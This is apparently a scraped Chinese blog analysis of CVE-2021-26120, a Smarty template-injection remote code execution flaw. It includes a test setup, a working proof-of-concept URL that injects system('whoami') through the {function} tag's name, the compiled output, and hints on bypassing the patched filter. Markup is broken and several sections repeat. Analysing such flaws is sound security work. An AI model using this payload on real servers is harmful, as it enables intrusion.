Smarty模板注入漏洞分析 (CVE-2021-26120)<\/h1>

漏洞概述<\/h2>
CVE-2021-26120是Smarty模板引擎中的一个远程代码执行漏洞，影响Smarty 3.1.38及以下版本。该漏洞允许攻击者通过精心构造的模板函数名称注入恶意PHP代码，导致服务器端任意代码执行。<\/p>

漏洞原理<\/h2>

模板编译机制<\/h3>

Smarty模板引擎的工作流程：<\/p>

当访问模板文件时，Smarty会根据模板内容生成对应的PHP编译文件<\/li>
生成的编译文件存储在templates_c\/<\/code>目录下<\/li>

后续相同请求直接调用已编译文件，否则重新编译<\/li>
<\/ol>
漏洞触发点<\/h3>
漏洞存在于{function}<\/code>标签的处理过程中，当处理函数名称时未进行充分过滤，导致攻击者可以注入任意PHP代码。<\/p>
漏洞复现<\/h2>
环境搭建<\/h3>
测试环境配置：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>include_once<\/span>('.\/libs\/Smarty.class.php'<\/span>);
<\/span><\/span>$smarty =<\/span> new<\/span> Smarty<\/span>();
<\/span><\/span>$my_security_policy =<\/span> new<\/span> Smarty_Security<\/span>($smarty);
<\/span><\/span>$my_security_policy-><\/span>php_functions<\/span> =<\/span> null<\/span>;
<\/span><\/span>$my_security_policy-><\/span>php_handling<\/span> =<\/span> Smarty<\/span>::<\/span>PHP_REMOVE<\/span>;
<\/span><\/span>$my_security_policy-><\/span>php_modifiers<\/span> =<\/span> null<\/span>;
<\/span><\/span>$my_security_policy-><\/span>static_classes<\/span> =<\/span> null<\/span>;
<\/span><\/span>$my_security_policy-><\/span>allow_super_globals<\/span> =<\/span> false<\/span>;
<\/span><\/span>$my_security_policy-><\/span>allow_constants<\/span> =<\/span> false<\/span>;
<\/span><\/span>$my_security_policy-><\/span>allow_php_tag<\/span> =<\/span> false<\/span>;
<\/span><\/span>$my_security_policy-><\/span>streams<\/span> =<\/span> null<\/span>;
<\/span><\/span>$my_security_policy-><\/span>php_modifiers<\/span> =<\/span> null<\/span>;
<\/span><\/span>$smarty-><\/span>enableSecurity<\/span>($my_security_policy);
<\/span><\/span>$smarty-><\/span>display<\/span>("string:"<\/span>.<\/span>$_GET['juju'<\/span>]);
<\/span><\/span><\/code><\/pre>POC分析<\/h3>
基础测试POC<\/strong>:<\/p>
\/?juju={function+name=test}{\/function}
<\/code><\/pre>
生成的编译文件内容：<\/p>
function<\/span> smarty_template_function_test_8448067526245a2812ef2c6_13818238<\/span>(Smarty_Internal_Template<\/span> $_smarty_tpl,$params) {
<\/span><\/span>    foreach<\/span> ($params as<\/span> $key =><\/span> $value) {
<\/span><\/span>        $_smarty_tpl-><\/span>tpl_vars<\/span>[$key] =<\/span> new<\/span> Smarty_Variable<\/span>($value, $_smarty_tpl-><\/span>isRenderingCache<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>恶意POC<\/strong>:<\/p>
\/?juju={function+name='rce(){};system("whoami");function '}{\/function}
<\/code><\/pre>
生成的恶意编译文件内容：<\/p>
function<\/span> smarty_template_function_rce<\/span>(){};system<\/span>("whoami"<\/span>);function<\/span> _20858581166245a35986de39_17347318<\/span>(Smarty_Internal_Template<\/span> $_smarty_tpl,$params) {
<\/span><\/span>    foreach<\/span> ($params as<\/span> $key =><\/span> $value) {
<\/span><\/span>        $_smarty_tpl-><\/span>tpl_vars<\/span>[$key] =<\/span> new<\/span> Smarty_Variable<\/span>($value, $_smarty_tpl-><\/span>isRenderingCache<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击原理<\/h3>

通过{function}<\/code>标签注入恶意代码到函数名中<\/li>
使用{};<\/code>结束前面的函数定义<\/li>
使用function<\/code>使后续字符串成为新函数名<\/li>
中间的代码会被作为独立PHP代码执行<\/li>
<\/ol>
代码分析<\/h2>
关键处理流程<\/h3>


模板渲染入口<\/strong>:<\/p>

display()<\/code> -> _execute()<\/code> -> createTemplate()<\/code><\/li>
render()<\/code> -> compiled->render()<\/code> -> process()<\/code><\/li>
<\/ul>
<\/li>

编译过程<\/strong>:<\/p>

compileTemplateSource()<\/code>: 编译模板源文件<\/li>
loadCompiledTemplate()<\/code>: 加载编译后的模板<\/li>
<\/ul>
<\/li>

函数标签处理<\/strong>:<\/p>

doCompile()<\/code> -> doParse()<\/code> -> callTagCompiler()<\/code><\/li>
对于{function}<\/code>标签，调用smarty_internal_compile_function.php<\/code>中的编译方法<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞关键点<\/h3>
在smarty_internal_compile_function.php<\/code>中，函数名称($_name<\/code>)未经充分过滤直接拼接进生成的PHP代码：<\/p>
\/\/ 原始代码
<\/span><\/span><\/span><\/span>$_name =<\/span> trim<\/span>($_attr['name'<\/span>], "'<\/span>\"<\/span>"<\/span>);
<\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>$output .=<\/span> "function smarty_template_function_<\/span>{<\/span>$_name}<\/span>"<\/span>;
<\/span><\/span><\/code><\/pre>修复方案<\/h2>
官方修复方法是对函数名称进行更严格的过滤，防止注入恶意代码。<\/p>
绕过技巧<\/h2>
在实际利用中，可能需要绕过以下限制：<\/p>

修改后的正则过滤：可通过换行符绕过<\/li>
open_basedir<\/code>限制：需要特定技巧绕过<\/li>
<\/ol>
参考链接<\/h2>

Smarty模板注入分析<\/a><\/li>
<\/ul>
总结<\/h2>
CVE-2021-26120展示了模板引擎在处理用户输入时的危险性，特别是在名称\/标识符处理环节。开发人员应确保对所有用户提供的输入进行严格过滤，特别是在会直接影响到代码生成的场景中。<\/p>

Smarty模板注入漏洞分析 (CVE-2021-26120)<\/h1>

漏洞概述<\/h2> CVE-2021-26120是Smarty模板引擎中的一个远程代码执行漏洞，影响Smarty 3.1.38及以下版本。该漏洞允许攻击者通过精心构造的模板函数名称注入恶意PHP代码，导致服务器端任意代码执行。<\/p>

漏洞原理<\/h2>

漏洞触发点<\/h3> 漏洞存在于{function}<\/code>标签的处理过程中，当处理函数名称时未进行充分过滤，导致攻击者可以注入任意PHP代码。<\/p>

代码分析<\/h2>

修复方案<\/h2> 官方修复方法是对函数名称进行更严格的过滤，防止注入恶意代码。<\/p>

总结<\/h2> CVE-2021-26120展示了模板引擎在处理用户输入时的危险性，特别是在名称\/标识符处理环节。开发人员应确保对所有用户提供的输入进行严格过滤，特别是在会直接影响到代码生成的场景中。<\/p>

漏洞概述<\/h2>
CVE-2021-26120是Smarty模板引擎中的一个远程代码执行漏洞，影响Smarty 3.1.38及以下版本。该漏洞允许攻击者通过精心构造的模板函数名称注入恶意PHP代码，导致服务器端任意代码执行。<\/p>

漏洞触发点<\/h3>
漏洞存在于`{function}<\/code>标签的处理过程中，当处理函数名称时未进行充分过滤，导致攻击者可以注入任意PHP代码。<\/p>`

修复方案<\/h2>
官方修复方法是对函数名称进行更严格的过滤，防止注入恶意代码。<\/p>

总结<\/h2>
CVE-2021-26120展示了模板引擎在处理用户输入时的危险性，特别是在名称\/标识符处理环节。开发人员应确保对所有用户提供的输入进行严格过滤，特别是在会直接影响到代码生成的场景中。<\/p>